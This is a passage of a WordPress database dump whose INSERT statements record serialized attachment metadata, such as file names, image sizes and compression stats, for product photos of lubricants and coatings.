ile";s:28:"krytox-eg-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"krytox-eg-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"krytox-eg-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18372, 1935, '_wp_attached_file', '2016/08/shutterstock_270175811.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18373, 1935, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5905;s:6:"height";i:3941;s:4:"file";s:34:"2016/08/shutterstock_270175811.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_270175811-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_270175811-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_270175811-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_270175811-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_270175811-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_270175811-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_270175811-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_270175811-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18374, 1936, '_wp_attached_file', '2016/09/krytox-aerospace-grease-oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18375, 1936, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3305;s:6:"height";i:2048;s:4:"file";s:39:"2016/09/krytox-aerospace-grease-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"krytox-aerospace-grease-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"krytox-aerospace-grease-oil-800x496.jpg";s:5:"width";i:800;s:6:"height";i:496;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"krytox-aerospace-grease-oil-768x476.jpg";s:5:"width";i:768;s:6:"height";i:476;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"krytox-aerospace-grease-oil-1600x991.jpg";s:5:"width";i:1600;s:6:"height";i:991;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"krytox-aerospace-grease-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"krytox-aerospace-grease-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"krytox-aerospace-grease-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"krytox-aerospace-grease-oil-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18376, 1937, '_wp_attached_file', '2016/09/krytox-gpl-grease-oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18377, 1937, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:33:"2016/09/krytox-gpl-grease-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"krytox-gpl-grease-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"krytox-gpl-grease-oil-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"krytox-gpl-grease-oil-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"krytox-gpl-grease-oil-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"krytox-gpl-grease-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"krytox-gpl-grease-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"krytox-gpl-grease-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"krytox-gpl-grease-oil-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18378, 1938, '_wp_attached_file', '2016/09/krytox-xht-grease-oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18379, 1938, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:1996;s:4:"file";s:33:"2016/09/krytox-xht-grease-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"krytox-xht-grease-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"krytox-xht-grease-oil-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"krytox-xht-grease-oil-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"krytox-xht-grease-oil-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"krytox-xht-grease-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"krytox-xht-grease-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"krytox-xht-grease-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"krytox-xht-grease-oil-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18380, 1939, '_wp_attached_file', '2016/09/krytox-nrt-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18381, 1939, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:29:"2016/09/krytox-nrt-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"krytox-nrt-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"krytox-nrt-grease-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"krytox-nrt-grease-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"krytox-nrt-grease-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"krytox-nrt-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"krytox-nrt-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"krytox-nrt-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"krytox-nrt-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:44;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18382, 1940, '_wp_attached_file', '2016/09/shutterstock_97401731.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18383, 1940, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:3510;s:4:"file";s:33:"2016/09/shutterstock_97401731.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_97401731-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_97401731-800x468.jpg";s:5:"width";i:800;s:6:"height";i:468;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_97401731-768x449.jpg";s:5:"width";i:768;s:6:"height";i:449;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"shutterstock_97401731-1600x936.jpg";s:5:"width";i:1600;s:6:"height";i:936;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_97401731-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_97401731-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_97401731-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_97401731-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18384, 1941, '_wp_attached_file', '2016/09/silicone-coating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18385, 1941, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4752;s:6:"height";i:3168;s:4:"file";s:28:"2016/09/silicone-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"silicone-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"silicone-coating-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"silicone-coating-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"silicone-coating-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"silicone-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"silicone-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"silicone-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"silicone-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18386, 1942, '_wp_attached_file', '2016/09/Urethane-Missle.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18387, 1942, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3648;s:6:"height";i:2736;s:4:"file";s:27:"2016/09/Urethane-Missle.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"Urethane-Missle-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"Urethane-Missle-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"Urethane-Missle-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"Urethane-Missle-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"Urethane-Missle-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"Urethane-Missle-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"Urethane-Missle-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"Urethane-Missle-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18388, 1943, '_wp_attached_file', '2016/09/krytox-lvp-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18389, 1943, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2600;s:6:"height";i:1733;s:4:"file";s:29:"2016/09/krytox-lvp-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"krytox-lvp-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"krytox-lvp-grease-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"krytox-lvp-grease-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"krytox-lvp-grease-1600x1066.jpg";s:5:"width";i:1600;s:6:"height";i:1066;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"krytox-lvp-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"krytox-lvp-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"krytox-lvp-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"krytox-lvp-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18390, 1944, '_wp_attached_file', '2016/09/Varnish-coating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18391, 1944, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4752;s:6:"height";i:3168;s:4:"file";s:27:"2016/09/Varnish-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"Varnish-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"Varnish-coating-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"Varnish-coating-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"Varnish-coating-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"Varnish-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"Varnish-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"Varnish-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"Varnish-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18392, 1945, '_wp_attached_file', '2016/09/krytox-aut-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18393, 1945, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:3510;s:4:"file";s:29:"2016/09/krytox-aut-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"krytox-aut-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"krytox-aut-grease-800x468.jpg";s:5:"width";i:800;s:6:"height";i:468;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"krytox-aut-grease-768x449.jpg";s:5:"width";i:768;s:6:"height";i:449;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"krytox-aut-grease-1600x936.jpg";s:5:"width";i:1600;s:6:"height";i:936;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"krytox-aut-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"krytox-aut-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"krytox-aut-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"krytox-aut-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18394, 1946, '_wp_attached_file', '2016/09/Conformal-coating-stripper.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18395, 1946, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4000;s:6:"height";i:4000;s:4:"file";s:38:"2016/09/Conformal-coating-stripper.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"Conformal-coating-stripper-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"Conformal-coating-stripper-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"Conformal-coating-stripper-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"Conformal-coating-stripper-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"Conformal-coating-stripper-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"Conformal-coating-stripper-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"Conformal-coating-stripper-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"Conformal-coating-stripper-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18396, 1947, '_wp_attached_file', '2016/09/EPONEX-UV-resistance.jpg'); 
